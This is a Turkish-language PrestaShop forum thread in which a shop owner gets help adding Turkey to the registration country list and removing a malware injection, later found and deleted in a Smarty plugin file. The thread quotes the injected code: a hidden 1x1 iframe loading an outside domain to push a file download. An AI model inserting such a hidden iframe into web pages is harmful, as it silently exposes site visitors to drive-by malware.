Jump to content

kayıt kısmında ülkeler eksik ve sitemde virüs var yardımmmm lütfen :S

djmatrak

Recommended Posts

arkadaşlar selamlar
2 sorun war

1 siteye üye kayıt olurken ülkeler eksik TÜRKİYE yok
diğer sorun

2 kullandığım pcde virüs varmış sanırım sitede bazı sayfalara girdiğim zaman bir trajan uyarısı alıyorum
html koduna bakınca anladım kodun en alt kısmında bir siteye iframe ile link verilerek otomatik olarak dosya indirmeye çalışıyor bu 2 sorunu nasıl düzeltirim ???

acaba virüslü dosyaların yerine tüm site dosyalarını üzerine yaz diyerek yüklesem düzelirmi ???

arkadaşlar selamlar
2 sorun war

1 siteye üye kayıt olurken ülkeler eksik TÜRKİYE yok
diğer sorun

2 kullandığım pcde virüs varmış sanırım sitede bazı sayfalara girdiğim zaman bir trajan uyarısı alıyorum
html koduna bakınca anladım kodun en alt kısmında bir siteye iframe ile link verilerek otomatik olarak dosya indirmeye çalışıyor bu 2 sorunu nasıl düzeltirim ???

acaba virüslü dosyaların yerine tüm site dosyalarını üzerine yaz diyerek yüklesem düzelirmi ???

1. Admin (yönetim) panelinden Shipping>>Countries bölümüne girin.
"Yeni ekle" ye tıklayıp açılan sayfadaki boşlukları Türkiye olarak doldurun
ve kaydedin. Bİr önceki sayfaya geri dönerek Türkiye'yi varsayılan ülke
yapıp kaydedin.

2. Virüs hangi sayfalarda ? Bu sayfaları tam olarak belirleyin.
Sitenin tüm dosayalarının üzerine yazmanız databaselerde sorun
yaratabilir Sadece virüslü dosyaları değiştirme imkanı olabilir.
Fakat virüslü dosyaları iyice belirlemelisiniz.

Selamlar ...

üstad 1.sorunu halletim, 2.sorunu ise sistemdeki tüm dosyaları locale attım tüm index dosyalarını açtım hepsi temizlendi ama ürün detay sayfasına girince yine uyarı veriyor, product.php ye baktım ama herhangi bi durum gözükmüyor

Sanırım sorun Thickbox eklentisinde çünkü ürün detay sayfasına bakınca

<![CDATA[
ThickboxI18nImage = 'Resim';
ThickboxI18nOf = '-';
ThickboxI18nClose = 'Kapat';
ThickboxI18nOrEscKey = 'veya ESC tuşuna basınız.';
ThickboxI18nNext = 'Sonraki >';
ThickboxI18nPrev = '< Önceki';
tb_pathToImage = '/img/loadingAnimation.gif';
//]]>
[removed]<iframe src="http://thedeadpit.com/?click=2450250" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

burdaki frame kodu bir dosya çekmeye çalışıyor nasıl bulucam ürün detay sayfasındaki th,ck box olayını ???

üstad 1.sorunu halletim, 2.sorunu ise sistemdeki tüm dosyaları locale attım tüm index dosyalarını açtım hepsi temizlendi ama ürün detay sayfasına girince yine uyarı veriyor, product.php ye baktım ama herhangi bi durum gözükmüyor

Sanırım sorun Thickbox eklentisinde çünkü ürün detay sayfasına bakınca

<![CDATA[
ThickboxI18nImage = 'Resim';
ThickboxI18nOf = '-';
ThickboxI18nClose = 'Kapat';
ThickboxI18nOrEscKey = 'veya ESC tuşuna basınız.';
ThickboxI18nNext = 'Sonraki >';
ThickboxI18nPrev = '< Önceki';
tb_pathToImage = '/img/loadingAnimation.gif';
//]]>
[removed]<iframe src="http://thedeadpit.com/?click=2450250" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

burdaki frame kodu bir dosya çekmeye çalışıyor nasıl bulucam ürün detay sayfasındaki th,ck box olayını ???

Thickbox eklentisinden şüpheleniyorsanız. Kullandığınız temanızdaki Thickbox.tpl dosyasını metin editörüyle açıp kontrol edin. Ayrıca, Prestashop/js/jquery/thickbox-modified.JScript dosyasınıda metin editöründe açarak kontrol edin.
Birde temanızdaki tüm tpl dosyalarını gözden geçirin.

Selamlar ....

ve olay çözülmüştür :D
Dreamwever Programını Seviyorum ya :) Dreamweaver programının CTRL+F Yani bul komutuyla açılan penceredeki seçenklerle klasör içindeki dosyaların içindeki kodu arattırabiliyormuşuz :D sonradan vardım farkına :)) şimdi temizledim dosyayı, ama çok alakasız bi klasöre girmiş meğerse tools\smarty\plugins/modifier.default.php dosyasına da bulaşmış ilgili satırı sildim şimdi sorun yok:) Sase Sağolasın yardım için